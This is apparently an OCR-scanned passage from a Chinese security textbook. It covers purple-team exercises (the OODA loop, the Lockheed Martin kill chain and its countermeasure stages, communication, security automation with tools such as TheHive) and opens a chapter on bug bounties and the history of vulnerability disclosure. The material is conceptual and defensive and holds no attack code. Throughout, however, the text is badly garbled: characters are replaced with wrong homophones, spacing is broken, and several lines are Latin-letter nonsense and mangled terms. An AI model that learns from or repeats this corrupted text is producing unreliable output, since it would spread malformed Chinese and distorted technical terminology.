而 在 过 滤 信 息 时 ， 要 意识 到 组 织 的 倾 回 和 偏见 。 调 整 阶段 将 得 到 决 朱 选 项 。 
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e RR 组 织 必须 决定 一 个 选项 。 该 选项 实际 上 就 是 组 织 要 进行 检验 的 假设 。 

e 行动 ”实施 已 经 决定 的 行动 ， 并 对 假设 进行 检验 。 

由 于 OODA 决 筑 框 架 是 周而复始 的 ， 在 实施 行动 后 ， 义 会 再 次 返回 观察 阶段 。 
紫 队 行动 期 间 , 这 样 的 决策 框架 对 于 指导 攻守 两 方 的 决策 极其 重要 。 紫 队 行 动 期 间 ， 
双方 小 组 都 有 很 多 决策 点 。 讨 论 两 个 小 组 的 决策 是 有 益 的 ，OODA 循 环 为 这 样 的 讨 
论 提供 了 框架 。 

使 用 诀 策 框 如 的 一 个 目标 是 更 好 地 理解 如 何 制定 决策 ， 从 而 提高 决策 水 平 。 更 
好 地 了 解 组 织 , 这 有 助 于 克制 个 人 偏见 , 让 恶意 攻击 者 更 难 预测 组 织 的 决策 .OODA 
循环 也 可 用 于 淤 清 恶 意 攻 击 者 的 意图 ， 并 和 演 试 为 恶意 攻击 者 创建 一 种 模糊 感 和 混乱 
感 。 如 果 组 织 的 OODA 循 环 的 运行 节奏 比 恶 意 攻 击 者 的 快 ， 那 么 组 织 将 处 于 攻势 ， 
而 恶意 攻 击 者 则 处 于 守 势 。 


8.3.2 ”破坏 杀伤 链 


下 面 从 紫 队 或 攻防 观点 分 析 涪 克 希 德 。 马 (Lockheed Martin) H 9128 AN D BENE 
架 。 该 框架 的 目的 是 识别 和 防止 网 络 入 侵 。 组 织 将 针对 框架 的 每 个 阶段 ， 从 攻防 观 
点 分 析 该 框架: 侦察 (Reconnaissance)、 制 作 定 问 攻 击 工 具 (Weaponization)、 输 送 
(Delivery)、 涯 洞 攻击 (Exploitation)、 安 装 (Installation)、 命 令 与 控制 (Command and 
Control，C2) 以 及 在 目标 内 行动 (Act on Object). 

紫 队 行动 与 红 队 行动 有 几 方 面 的 不同 ， 包 括 小 组 之 间 共 至 的 信息 量 的 友和 寞 。 一 
些 紧 队 行动 以 “侦察 ”作为 开始 阶段 ， 此 时 ， 红 队 将 收集 开源 情报 (Open Source 
Intelligence，OSINT)， 收 集 电子 邮件 地 址 ， 以 及 从 各 个 来 源 搜 罗 人 信息。 很 多 紧 队 行 
动人 不 太 注 章 侦察 阶段 ， 更 依赖 于 明 过 访谈 和 技术 文档 收集 有 关 目 标的 信息 。 了 人 解 哪 
些 信息 类 型 是 公开 的 仍 有 价值 。 红 队 仍 可 选择 使 用 社交 媒体 进行 研究 ， 并 将 重点 关 
注 组 织 的 最 新 事件 和 新 闻 。 红 队 还 可 能 收集 目标 外 部 资产 的 技术 信息 ， 检 查 信 息 泄 


器 问题 
“侦察 ”阶段 很 难 破坏 ， 因 为 红 队 的 大 多 数 活动 在 该 阶段 都 是 被 动 的 。 蓝 队 可 
搜集 侦察 阶段 特有 的 浏览 器 行为 信息 ， 并 与 其 他 IT 团队 一 起 了 解 有 关 站 点 访客 和 坦 


询 的 更 多 信息 。 意 队 了 解 到 的 信息 将 用 于 确定 针对 侦 守 活动 的 防御 优先 顺序 。 

在 “制作 定 癌 攻击 工具 ”阶段 ， 红 队 将 准备 有 反动 攻击 。 人 准备 一 个 C2 基础 淋 构 ， 
选择 要 使 用 的 攻击 方法 ， 目 定义 伟 意 软件 ， 并 制作 沼 用 的 攻击 载 行 。 监 队 不 能 即时 
检测 到 该 阶段 ， 但 可 在 看 到 攻击 行为 之 后 了 解 这 一 点 。 贤 队 对 载 傈 实施 恶意 软件 分 
析 ， 收 集 信息 (包括 恶意 软件 的 时 间 线 )。 旧 式 恶 意 软件 通常 不 如 新 式 恶 意 软件 的 威 
力 大 ， 后 痢 经 过 定制 已 经 专门 指 同 组 织 。 收 集 文件 和 元 数据 供 未 来 分 析 之 用 ， 目 队 
将 确定 工件 (Artifacb 和 是否 与 任何 已 知 的 网 络 攻击 一 致 。 有 些 么 队 演 练 专注 于 生成 一 
段 目 定义 的 恶意 软件 ， 确 保 览 队 能 够 池 同 该 严 间 软件 并 予以 适当 啊 应 。 
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在 “输送 ”阶段 发 起 攻击 。 红 队 将 发 送 钓鱼 电子 邮件 ， 通 过 USB 传 播 恶意 软件 ， 
或 通过 社交 妹 体 攻击 输送 载 千 。 在 这 个 阶段 ， 赣 队 最 终 有 机 会 检测 和 阻止 攻击 。 症 
队 将 分 析 输 送 机 制 ， 理 解 上 游 功 能 。 赣 队 将 使 用 制作 的 定 回 攻击 工具 工件 创建 入 侵 
指标 ， 在 输送 阶段 检测 新 载 衙 ， 并 对 收集 的 所 有 相关 日 志 进 行 分 析 , 包括 电子 邮件 、 
设备 、 操 作 系统 、 应 用 程序 和 Web 日 志 。 

红 队 在 “漏洞 攻击 ”阶段 获得 对 受害 方 的 访问 权 ， 将 在 攻击 中 利用 软件 、 硬 件 、 
物理 安全 、 人 为 漏 词 或 配置 错误 。 红 队 利 用 服务 需 漏 铜 等 目 行 触及 攻击 ， 也 可 能 医 
为 用 户 单 击 电 子 邮 件 中 的 链接 而 触发 攻击 。 蓝 队 通 过 加 固 环境 、 对 员工 进行 安全 主 
题 (如 网 络 钓鱼 ) 塔 训 、 对 开 有 人员 进 行 安 全 编码 技术 塔 训 以 及 部 普 安 全 控制 ， 采 取 
多 种 方式 来 保护 环境 ， 从 而 防止 组 织 受 到 攻击 。 监 队 将 执行 现场 调查 ， 了 解 可 从 攻 
击 中 吸取 哪些 教训 。 

如 果 红 队 能 持续 访问 目标 的 环境 ， 将 进入 “安装 ”阶段 。 通 过 安装 服务 或 配置 
目 动 运行 键 ， 可 在 多 种 设备 (包括 服务 磺 和 工作 站 ) 上 实现 持续 访问 。 赣 队 执 行 防御 
行动 ， 例 如 在 该 阶段 之 前 在 系统 上 安装 基于 主机 的 入 侵 防 御 系 统 
(Host-based Intrusion Prevention System，HIPS)、 反 病毒 软件 、 监 探 进程 ， 实 施 防 御 
行动 ， 绥 解 攻击 造成 的 影响 。 一 旦 检测 到 和 友 现 恶意 软件 ， 和 是 队 将 提取 恶意 软件 的 
证 书 ， 进 行 分 机 ， 了 解 亚 意 软 件 是 否 需要 管理 权限 。 与 前 面 一 样 ， 分 析 亚 意 软 件 是 
新 的 还 是 旧 的 ， 以 确定 恶意 软件 是 否 专门 针对 当前 环境 进行 过 定制 化 处 理 。 

在 “命令 与 控制 (Command and Control，C2)” 阶 段 ， 红 队 或 攻击 者 使 用 C2 基础 
架构 建立 双向 通信 。 这 通常 使 用 专用 协议 ， 此 类 协议 可 自由 地 将 受 保护 网 络 内 部 的 
信息 传输 给 攻击 者 。 电 子 邮 件 、Web 或 DNS 协议 因为 通常 不 会 阻止 信息 出 站 而 常 被 
使 用 。 不 过 ， 可 以 通过 多 种 机 制 来 取得 C2 效果 ， 包 括 使 用 无 线 或 手机 技术 ， 因 此 在 
确定 C2 流量 和 机 制 时 ， 视 野 必 须 开阔 一 些 。C2 阶 段 是 蓝 队 通过 阻塞 C2 通信 来 阻止 
攻击 的 最 后 机 会 。 赣 队 可 通过 恶意 软件 分 析 ， 发 现 有 天 C2 基 础 架构 的 信息 。 如 果 入 
口 和 出 口 流量 都 经 过 代理 ,或 者 流量 都 流 经 槽 洞 (Sinkhole)， 大 多 数 网 络 流量 都 可 以 
得 到 控制 。 

到 了 杀伤 链 的 “在 目标 内 行动 ”阶段 ， 攻 击 者 或 红 队 已 完成 目标 。 收 集 到 凭据 
信息 ， 执 行 权限 提升 ， 可 在 环境 中 横 同 移动 ， 可 对 数据 进行 收集 、 修 改 、 销 毁 或 渗 
汤 。 蓝 队 则 在 检测 和 啊 应 攻击 。 此 时 可 能 出 现 “ 男 一 种 结局 ” 蓝 队 可 演练 不 同 的 方 
法 ， 在 啊 应 攻击 时 使 用 不 同 的 工具 。 玉 过程 通 钊 将 全 面 实施 ， 高 宫 团队、 法务 团队 、 
主要 的 利益 相关 方 以 及 组 织 豚 计划 中 的 其 他 人 都 会 参与 进来 。 在 实际 攻击 中 ， 公 天 
部 门 、 执 法 部 门 、 银 行 、 供 应 商 、 合 作 伙伴 、 母 公司 和 客户 都 会 参与 进来 。 条 队 演 
练 期 间 ， 组 织 可 能 选择 进行 果 面 推演 ， 从 而 完整 地 模拟 攻击 。 贤 队 则 在 检测 模 癌 移 
动 、 权 限 提 升 、 账 尸 创建 、 数 据 渗 漏 或 其 他 攻击 活动 。 如 果 预 完 部 壮 事 故 啊 应 和 数 
FIA TA, AER IRE. APSR), HDS feel, PERS, Foe 
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8.3.3 FRMATEXTRIER 


AN TARE RUE AREE RUM. FEAR. PT. BEZR. RE xml urb AAR 
破坏 所 有 攻击 链 。 在 实际 中 ， 最 好 答 试 在 “检测 ”和 “拒绝 ”对 筑 阶 段 尽 早 符 试 捕 
获 攻击 ， 不 要 等 到 “中 断 ” 或 “降级 ”阶段 才 下 手 。 概 念 十 分 和 单 : 在 前 面 讨论 的 
aii e H J] (Lockheed Martim) 网 络 杀 伤 链 的 每 个 阶段 ， 要 目 问 可 做 哪些 事情 来 
EM, FEE PE ER RE ahh. EKE, KWAR EIET RAE 
染 的 一 个 阶段 。 例 如 ， 紫 队 演 练 可 专注 于 “检测 ”机 制 ， 直 到 这 个 机 制 得 到 改善 
为 止 。 

下 面 备 点 介绍 杀伤 链 对 策 框 架 的 “检测 ”部 分 ， 列 举 一 些 例子 ， 演 示 在 杀伤 链 
的 每 个 阶段 检测 敌 方 的 活动 。 检 测 “ 债 察 ”阶段 是 充满 挑战 的 ， 但 Web 分 析 可 提供 
一 些 有 用 的 信息 。 

检测 “制作 定 癌 攻击 工具 ”实际 上 是 无 法 完成 的 ， 因 为 攻击 准备 工作 通 单 不 在 
目标 环境 中 完成 ， 但 网 络 入 侵 检 测 系 统 (Network Intrusion Detection Systems, NIDS) 
和 网 络 入 侵 防 御 系 统 QNetwork Intrusion Prevention Systems, NIPS) n] it £5 ZXAap FEE 
向 组 织 发 出 警报 。 在 “输送 ”一 个 钓 鱼 攻击 时 ， 一 个 接受 过 良好 培训 的 用 户 可 以 发 
觉 异 第 情况 ,代理 解决 方案 也 可 能 检测 到 攻击 。 妆 点 安全 解决 方案 (包括 基于 主机 的 
入 侵 检 测 系统 ) 和 反 和 恶意 软件 解决 方案 可 在 “漏洞 攻击 ”和 “安装 ”阶段 检测 到 攻击 。 
NIDS/NIPS 可 检测 到 “命令 与 控制 (C2)” 流 量 并 予以 阻止 “在 目标 内 行动 ”阶段 ， 
日 志 或 用 户 行 为 分 析 (User Behavior Analytic, UBA) 可 用 于 检测 攻击 者 (或 红 队 ) 话 动 。 
关于 如 何 应 用 杀伤 链 对 策 框 架 的 示例 不 多 。 每 个 环境 都 是 不 同 的 ， 每 个 组 织 都 有 不 
[ROGER e 

现在 采取 不 同方 式 ， 专 注 于 杀伤 链 的 C2 阶段 ， 并 讨论 每 个 对 策 框架 阶段 (检测 、 
拒绝 、 中 断 、 降 级 、 误 导 及 过 制 ) 的 应 对 方式 。 网 络 入 侵 检测 系统 可 检测 到 C2 流量 。 
可 将 防火 墙 配 置 为 拒绝 C2 流量 。 网 络 入 侵 防 御 系 统 可 用 于 中 断 C2 流 量 。 医 性 蜜 馈 
(TarpiD 和 槽 洞 可 用 于 使 C2 流量 降级 。 NDS 重 定向 可 用 于 误导 C2 流量 。 很 多 组 织 使 用 
这 些 框架 构筑 防线 ， 组 织 紫 队 行动 。 在 组 织 此 类 行动 时 ， 组 织 安全 负责 人 的 头脑 中 
务必 要 有 一 个 宏观 规划 。 


8.3.4 沟通 


在 紫 队 行动 中 ， 蓝 队 和 红 队 之 间 需 要 频繁 地 进行 详细 沟通 。 一 些 紫 队 项 目 是 短 
期 的 , 不 会 生成 大 量 数据 (例如 ， 某 次 紫 队 行动 时 在 测试 正在 生产 的 一 种 设备 的 安全 
控制 )。 但是， 持续 性 紫 队 行动 以 及 由 在 保护 企业 的 紫 队 行动 可 生成 大 量 数 据 ; 考虑 
到 Mitre ATT&CK 算 阵 和 洛克 希 德 。 3 ] (Lockheed Martin) 网 络 杀 伤 链 框架 和 对 策 框 
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架 提 出 的 指导 意见 ， 此 类 数据 会 更 多 。 

可 在 开始 测试 和 啊 应 活动 前 ， 为 每 个 紫 队 行动 编写 沟通 计划 。 紫 队 行动 期 间 ， 
沟通 途径 有 会 议 、 协 同 工 作 以 及 提交 各 种 报告 ， 如 状态 报告 、 测 试 结果 报告 以 及 行 
动 小 结 报告 (AAR)。 一 些 研究 结果 需要 列 出 证 据 。 览 队 将 在 当前 安全 环境 中 加 入 所 
发 现 的 入 侵 指 标 [OC)。 红 队 必 须 详 细 记 录 测 试 活动 的 执行 时 间 和 执行 方式 。 在 测试 
中 将 创建 和 存储 许多 证 据 图 、 内 存 转 储 和 捕获 的 数据 包 ， 以 供 未 来 参考 。 目 标 是 确 
保 吸 取 所 有 教训 ， 抓 住 每 一 次 改进 机 会 。 

紫 队 可 利用 多 个 指标 来 快速 跟踪 改动 状况 ， 如 平均 检测 时 间 、 平 均 啊 应 时 间 、 
平均 修正 时 间 等 。 通 过 度量 安全 检测 和 啊 应 时 间 的 改进 ， 并 沟通 这 些 改进 ， 将 可 推 
动 和 支持 紫 队 行动 。 第 7 章 介 绍 的 许多 沟通 考虑 事项 同样 适用 于 紫 队 行动 ， 特 别 是 ， 
需要 一 个 AAR 来 记录 从 不 同 角 度 给 出 的 意见 和 建议 。 不 同 来 源 的 反馈 至 关 重 要 ， 可 
显著 提高 对 网 络 威胁 的 啊 应 能 力 。AAR 可 促使 组 织 购买 更 好 的 设备 、 改 进 流 程 、 投 
入 更 多 培训 资金 ， 以 及 更 改 工 作 日 程 表 以 免 用 餐 时 出 现 人 员 缺 位 、 完 善 联 系 程 序 、 
投入 更 多 资金 购买 某 些 工具 或 放弃 无 效 的 工具 。 最 后 ， 赣 队 和 红 队 应 当 感 到 障碍 已 
经 被 清除 。 


8.4 条 队 的 优化 和 目 动 化 


最 成 熟 的 组 织 往往 在 环境 中 配置 了 安全 的 自动 化 和 可 调度 化 (Orchestration)， 极 
大 地 加 快 了 攻防 演练 的 速度 。 安 全 的 上 自动 化 涉及 使 用 目 动 化 系统 来 检测 和 阻止 网 络 
威 肋 。 安 全 的 可 调度 化 是 指 将 安全 应 用 程序 和 流程 (Process) 联 系 起 来 、 集 成 在 一 起 。 
当 结合 使 用 目 动 化 和 全 面 协调 时 ,可 目 动 完 成 任务 、 编 排 工作 列表 、 集 成 安全 工具 ， 
在 整个 环境 中 协同 工作 。 很 多 安全 任务 都 可 实现 上 自动 化 和 可 调度 化 ， 如 攻击 、 啊 应 
以 及 其 他 操作 (如 提交 报告 等 )。 

安全 的 目 动 化 和 可 调度 化 可 避免 重复 的 、 繁 杂 的 任务 ， 达 到 精简 流程 的 目的 。 
也 可 极 大 地 加 快 啊 应 速度 ， 有 些 情况 下 ， 可 将 鉴别 和 分 级 (Triage) 过 程 缩减 到 在 几 分 
钟 内 完成 。 许 多 组 织 开 始 时 针对 简单 任务 实施 目 动 化 和 可 调度 化 。 钓 鱼 调 得 或 指标 
设计 是 重复 任务 ， 开 始 时 从 此 类 任务 入 手 是 不 错 的 起 点 。 另 外 ， 可 针对 恶意 软件 分 
析 实 施 上 自动化 和 可 调度 化 ， 以 便 很 好 地 体验 过 程 优化 。 

在 安全 程序 中 , 通过 优化 紫 队 行动 , 将 取得 令 人 激动 的 改进 效果 。 使 用 AttackIQ 
的 FireDrill 等 攻击 目 动 化 开源 工具 ， 并 将 其 与 Mitre ATT&CK 和 矩阵 等 框架 结合 使 用 ， 
可 提高 紫 队 的 能 力 ， 改 进 安全 状况 。 

优化 攻击 后 ， 有 必要 分 析 如 何 实 现 防御 活动 的 目 动 化 和 可 调度 化 。 精 细 的 工作 
流 可 实现 可 调度 化 。Phantom 提 供 一 个 免费 的 社区 版 本 ， 可 与 人 尽 于 册 (Playbook) 结 合 
使 用 。 在 编写 手册 时 ， 不 需要 广泛 的 编码 知识 ， 也 不 需要 使 用 Python 进行 自 定义 。 
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考 谍 在 环境 中 运用 以 下 手册 逻辑 ， 实 现 不 同 工 具 之 间 的 可 调度 化 交互 : 


使 用 AV(Anti-Virus， 反 病名 ) 或 [DS 工具 检测 恶意 软件 -> 虚拟 机 快照 -> 使 用 网 
络 访问 控制 (Network Access Control，NAC) 对 设备 进行 隔离 - > 分 析 内 存 - > 分 析 文 
EAS AR - > 销毁 沙 箱 中 的 文件 - > 查找 地 理 位 置 - > 猎 杀 端点 文件 - > 阻止 哈 希 值 -> 
阻止 URL 


也 可 实施 和 紧 队 的 流程 优化 。 有 很 多 早 越 的 开源 了 下 协作 工具 。 受 欢迎 程度 比较 高 
的 是 TheHive 项 目 。TheHive 项 目 是 一 个 分 机 和 安全 运 间 中心 (Security Operations 
Center，SOC) 可 调度 化 平台 ， 内 置 了 SOC 工 作 流 和 协作 功能 ;将 调查 组 合 为 case， 
又 将 case 分 解 为 任务 。TheHive 具 有 Python API， 人 允许 分 析 人 员 发 送 警 报 ， 并 从 不 同 
来 源 ( 如 SIEM 系 统 或 电子 邮件 ) 创 建 case。TheHive 项 目 还 提供 一 些 辅 助 工 具 ， 如 
Cortex，Cortex 是 一 个 用 于 批量 分 析 数 据 的 目 动 化 工具 。Cortex 可 从 TheHive 存 储 库 
提取 IOC。Cortex 具 有 用 于 主流 服务 (如 VirusTotal、 DomainTools、PassiveTotal 和 Google 
Safe Browsing) 的 分 析 句 。TheHive 项 目 也 创建 了 Hippocampe，Hippocampe 是 一 个 威 
胁 - 反 馈 - 聚 合 工 具 (Threat-Feed-Agegregation Tool))， 人 允许 组 织 通 过 REST API 或 Web UI 
进行 但 询 。 

有 具有 到 足 预算 的 组 织 ， 或 某 用 开源 工具 的 组 织 可 以 使 用 很 多 商业 产品 ， 对 沉 程 
和 攻防 活动 进行 目 动 化 和 可 调度 化 。 可 集成 诸如 Phantom rj MV he. Verodin, 
ServiceNow 以 及 各 种 了 商用 SEM 和 日 志 聚 合 占 等 工具 来 优化 流程 。 


8.5 ” 本草 小 结 


不 管 要 熟练 掌握 哪 门 技能 ， 都 需要 热情 ， 需 要 重复 练习 。 紫 队 行动 允许 进攻 安 
全 小 组 与 防御 安全 小 组 之 间 进 行 网 络 对抗 。 最 终 ， 两 个 小 组 都 能 完善 技能 集 ， 并 获 
得 良好 回报 。 紫 队 行动 将 红 队 攻击 与 蓝 队 响应 结合 成 一 个 整体 , 通过 协作 促进 完善 。 
任何 组 织 都 不 应 该 认为 自身 防御 是 坚不可摧 的 。 通 过 测试 攻防 有 效 性 ， 可 保护 组 织 
在 网 络 安全 控制 上 的 投资 ， 使 安全 防御 走向 成 熟 。 


SOS 漏洞 赏 金 计 划 


本 章 从 软件 开发 商 和 安全 研究 人 员 两 个 角度 讨论 漏洞 赏 金 计 划 (Bug Bounty 
Program)。 本 章 将 详细 讨论 漏洞 披露 主题 ,包括 导致 最 新 漏洞 赏 金 计划 的 历史 趋势 。 
例如 ， 本 书 全 方位 讨论 了 “完全 向 公众 披露 ” 允许 研究 人 员 决定 要 采用 的 漏洞 处 轩 
方法 。 本 章 还 将 讨论 漏洞 赏 金 计划 的 不 同类 型 ， 包 括 公司 、 政 府 、 非 公开 (Private)、 
公开 (Public) 和 开源 形式 。 此 后 还 将 从 程序 所 有 者 (供应 商 ) 和 研究 人 员 的 角度 探讨 
Bugcrowd 漏 洞 赏 金平 台 ， 介 绍 两 种 情况 下 的 界面 。 接 着 将 讨论 研究 人 员 如 何 通过 查 
找 漏洞 谋生 ， 最 后 讨论 事故 响应 ， 并 从 软件 开发 商 的 角度 分 析 如 何 处 理 接收 到 的 漏 
洞 报告 。 
本 章 分 析 整 个 漏洞 披露 报告 和 响应 过 程 。 


本 草 讨 论 的 主题 如 下 : 

漏洞 披露 的 历史 

漏洞 沈 金 计划 

深入 分 析 Bugcrowd 

HE LAS FR Ds] AE 

事故 啊 应 (ncident Response, IR) 


9.1 i53 $&HJJ7J S. 


软件 漏洞 (Vulnerability) 的 历史 与 软件 本 身 一 样 长 。 简 单 而 言 ， 软 件 漏 洞 是 软件 
设计 或 实施 方面 的 弱点 (Weakness)， 可 被 攻击 者 加 以 利用 。 有 必要 指出 ， 并 非 所 有 
缺陷 Bug) 都 是 漏洞 (Vulnerability)。 往往 使 用 “可 利用 因素 ”来 区 分 缺陷 和 漏洞 。 2015 
年 ，Synopsys 发 表 了 对 100 亿 行 代码 的 分 析 结 果 。 研 究 显 示 ， 阐 业 代码 每 1000 行 代码 
(Lines of Code，LoC) 有 0.61 个 缺陷 ， 而 开源 软件 每 1000 行 代码 有 0.76 个 缺陷 。 对 照 
诸如 OWASP Top 10 等 行业 标准 ， 研 究 结果 表明 商业 代码 要 好 一 些 。 由 于 现代 应 用 程 
序 通常 具有 数 十 万 行 代码 ， 甚 至 数 百 万 行 代码 ， 一 个 典型 应 用 程序 可 能 有 几 十 个 安 
全 漏洞 。 有 一 件 事 情 是 确定 的 : 只 要 是 由 人 开发 的 软件 ， 其 中 必定 存在 漏洞 。 另外， 
只 要 存在 漏洞 ， 用 户 就 处 于 危险 状态 。 因 此 ， 安 全 人 员 和 研究 人 员 有 责任 在 恶意 攻 
击 者 利用 漏洞 伤害 用 户 之 前 ， 预 防 、 查 找 和 修复 这 些 漏洞 。 

首先 ， 在 “公共 安全 ”方面 是 存在 争议 的 。 将 别人 的 安全 置 于 自己 的 安全 之 上 
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是 一 件 高 沿 的 事情 ， 但 必须 考虑 一 个 特定 行动 是 否 对 公共 安全 有 益 。 例 如 ， 如 采 不 
报告 漏洞 ， 因 此 导致 多 年 未 打 相 应 的 补丁 ， 但 后 来 攻击 者 肥 现 了 这 个 问题 ， 利 用 访 
漏洞 发 动 零 日 攻击 ， 这 对 公共 安全 有 好 处 吗 ? 其 次 ， 如 果 安 全 人 员 在 软件 开发 商 有 
机 会 修正 问题 前 发 布 了 汤 润 报告 ， 这 对 公共 安全 意味 看 什么 ? 有 人 认为 ， 在 公布 汤 
洞 与 修改 汤 洞 之 则 的 一 段 时 间 里 ， 公 众 面 临风 险 ; 也 有 人 认为 ， 这 么 做 是 必要 的 ， 
可 以 通过 考 辱 软件 开 有 友 商 ， 促 使 软件 开 及 丙 以 最 快 的 速度 更 正 问 题 。 在 这 件 事 情 上 
难 有 统一 意见 ， 与 此 相反 ， 这 是 一 个 激烈 争论 的 问题 。 本 书 遭 循 道德 黑客 精神 ， 倾 
回 于 以 道德 方式 或 协调 方式 进行 披露 ( 见 稍 后 的 讨论 ); 但 本 书 也 将 这 些 选 项 都 呈现 
出 来 ， 供 大 众 上 自行 选择 。 

软件 供应 商 往 往 面 临 厦 披 圳 困境。 发 布 漏 洞 信息 会 改变 软件 对 于 用 户 的 价值 。 
正如 Chio 等 人 讨论 的 ， 用 户 购 买 软件 ， 并 对 软件 质量 有 一 定 的 期 望 。 更 新 钉 丁 时 ， 
有 些 用户 认 为 软件 价值 提高 了 ， 有 些 用 户 认 为 软件 价值 降低 了 。 更 粳 糕 的 是 ， 恶 意 
攻击 者 也 根据 披露 的 漏洞 数量 来 确定 目标 的 价值 。 如 果 一 个 软件 从 未 更 新 ， 恶 总 攻 
击 者 可 能 认为 有 必要 对 目标 进行 评 佑 ， 目 标 可 能 存在 很 多 漏洞 。 另 一 方面 ， 如 采 一 
个 软件 频 楷 更 新 ， 则 表明 供应 丙 在 努力 提高 安全 性 ， 恶 意 攻 击 者 可 能 悖 迟 而 去 。 不 
过 ， 如 果 打 了 补丁 的 漏洞 类 型 牵涉 更 广泛 的 问题 ， 与 更 广泛 的 漏洞 类 型 (如 绥 冲 区 谥 
出 远程 攻击 ) 有 关 ， 则 恶意 攻击 者 可 能 认为 可 顺 腾 摸 瓜 ， 找 到 更 多 漏 洞 ; 对 于 恶意 攻 
击 者 而 言 ， 这 束 像 昆虫 看 到 了 灯光 ， 或 次 包 咒 到 了 血腥 味 。 

第 用 的 披露 方法 包括 完全 癌 供 应 丙 披 圳 (Full Vendor Disclosure) 以 及 完全 回 公 众 
披露 (Full Public Disclosure)。 下 面 将 摘 述 这 些 概念 。 


coy ER: 这 些 术 语 是 存在 争议 的 ， 有 些 人 更 愿意 选择 “部 分 向 供应 商 披露 


bue (Partial Vendor Disclosure)”， 处 理 概念 验证 (Proof of Concept, POCMN 6 
情形 或 其 他 人 参与 披露 过 程 的 情形 。 为 简单 起 见 ， 本 书 将 一 直 使 用 上 述 
术语 。 


9.1.1 完全 回 供 应 商 披露 


大 约 从 2000 年 开始 ， 一 些 研究 人 员 更 多 与 供应 商 开 展 协 作 ， 即 “完全 回 供 应 丙 
披露 ”。 采 用 这 种 方法 时 ， 研 究 人 员 回 供应 商 完 整 披 露 漏洞 ， 不 同 第 三 方 公开 。 之 所 
以 采用 这 种 披露 方式 ， 有 多 个 原因 ， 包 括 不 愿 承担 法 律 赔偿 、 没 有 可 用 来 公开 发 布 
信息 的 社交 媒体 渠道 、 对 全 体 软 件 开发 人 员 的 尊重 和 等， 因此， 研究 人 员 选 择 与 供应 
商 协 作 修 复 漏洞 。 

这 种 方法 单 导 致 漏 铜 的 修复 时 间 肚 遥 无 期 。 许 多 研究 人 员 只 是 提交 信息 ， 此 后 
就 只 能 被 动 等 待 ， 直 至 软件 开发 商 修复 漏洞 为 止 ， 当 然 软件 开发 商 可 能 永远 都 不 修 
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复 。 这 种 公开 方法 的 缺点 显 而 多 见 : 软件 供应 商 缺 少 修复 漏洞 的 动力 。 如 采 研 究 人 
员 愿 音 无 限期 等 每 ， 义 何必 看 蕊 呢 ? 尺 外 ， 修 复 漏 洞 可 能 成 本 局 晤 ， 如 采 没 有 社区 
妹 体 的 督促 ， 不 给 漏洞 打 补 ] 也 不 会 舍 成 严重 后 末 。 

为 外 ， 软 件 供应 商 面 临 一 个 问题 ， 如 果 修 复 安全 问题 却 示 对 外 公开 ， 很 多 用 请 
不 会 及 时 给 软件 打 寂 丁 。 万 一 方面 ， 攻 击 痢 可 使 用 本 书 讨论 的 技术 ， 针 对 补丁 进行 
逆 癌 工程 友 现 问题 ， 从 而 对 未 打 补 本 的 用 尸 肥 动 比 以 往 更 狐 烈 的 攻击 。 若 虑 到 这 种 
披露 方式 和 存在 的 诸多 问题 ， 引 出 了 为 一 种 披露 方式 : EARE o 


9.1.2 元 全 同 公 众 扳 露 


由 于 供应 了 商 可 能 不 及 时 采取 措施 修复 漏洞 ， 很 多 安全 研究 人 员 决 定 将 决定 权 掌 
握 在 自己 手 里 。 有 数不胜数 的 杂志 、 邮 件 列表 和 用 户 在 讨论 漏洞 ， 包 括 创 建 于 1993 
年 的 著名 的 Bugtraq 邮 件 列 表 。 多 年 来 ， 黑 客 社区 报 怨 供 应 商 处 理 不 力 或 对 研究 人 员 
不 够 坦 重 。2001 年 ， 安 全 顾问 Rain Forest Puppy 和 采取 了 一 种 激烈 的 做 法 ， 声 称 Rain 
Forest Puppy 只 给 供应 商 一 周 的 啊 应 时 间 ， 到 期 后 ，Rain Forest Puppy ARAA 
ju. 2002, #4 Full Disclosure 邮 件 列表 诞生 ， 十 多 年 来 一 直 作 为 披露 平台 ， 
研究 人 员 可 自由 地 发 布 漏 洞 细节 ， 而 在 此 之 前 既 可 辐 供 应 商 通告 ， 也 可 不 同 供应 商 
通告 。 该 领域 的 一 些 开 拓 者 ， 如 Bruce Schneier 认 为 这 是 唯一 能 得 到 结果 的 方式 。 其 
他 一 些 知名 人 物 ， 如 Marcus Ranum 则 不 赞同 这 种 做 法 ， 认 为 做 法 只 妥 ， 不 够 安全 。 
与 前 面 一 样 ， 关 于 这 个 问题 几乎 没有 共识 。 谁 对 谁 错 ， 需 要 由 大 众 自 行 判断 。 

这 种 做 法 的 好 处 显而易见 。 首 先 ， 有 些 人 认为 ， 在 羞辱 难当 时 ， 软 件 供应 商 最 
可 能 修复 问题 。 其 次 ， 这 种 方式 也 并 非 没 有 问题 。 采 用 这 种 方法 时 ， 供 应 丙 没 时 间 
以 合理 方式 啊 应 ， 可 能 仓促 应 对 ， 没 能 根除 实质 性 问题 。 当 然 ， 此 类 仓促 之 举 很 快 
为 其 他 人 员 察 党， 于 是 披露 过 程 又 重复 了 一 次 。 还 有 ， 如 果 一 个 软件 供应 商 需 要 处 
理 的 漏洞 位 于 库 中 ， 而 库 代 码 并 非 由 这 个 软件 供应 商 开 发 ， 也 会 出 现 问题 。 例 如 ， 
当 OpenSSL 出 现 Heartbleed 问 题 时 ， 数 和 干 个 网 站 、 应 用 程序 和 操作 系统 分 发 版 本 面临 
攻击 。 每 个 软件 开 友 人 员 都 必须 快速 了 解 信息 , 在 应 用 程序 中 添加 Heartbleed 库 的 更 
新 版 本 。 这 耗费 时 间 ， 一 些 软件 供应 商 的 处 理 速度 比 其 他 软件 供应 商 慢 ; 在 此 期 间 ， 
很 多 用 户 处 于 不 安全 状态 ， 因 为 攻击 者 开始 在 发 布 新 版 本 的 几 天 时 间 ， 利 用 漏洞 发 
动 攻 击 。 

完全 加 公众 披露 的 另 一 个 好 处 是 同 公 众 改 布 警告 信息 ， 使 用 户 能 在 补丁 发 布 前 
采取 缓解 步骤 。 基 本 想法 是 黑 帽 黑客 已 了 解 到 问题 ， 因 此 让 大 众 做 好 准备 是 有 益 
的 。 在 茶 种 意义 上 ， 这 促进 了 攻击 者 和 防御 者 之 间 的 信息 对 等 。 

尽管 如 此 ， 公 众 可 能 因此 受害 的 问题 依然 存在 。 回 公共 完全 披露 漏洞 后 ， 公 众 
更 安全 了 ， 还 是 更 危险 了 ?为 全 面 理解 这 个 问题 ， 必 须 意 识 到 : 恶意 攻击 者 也 在 进 
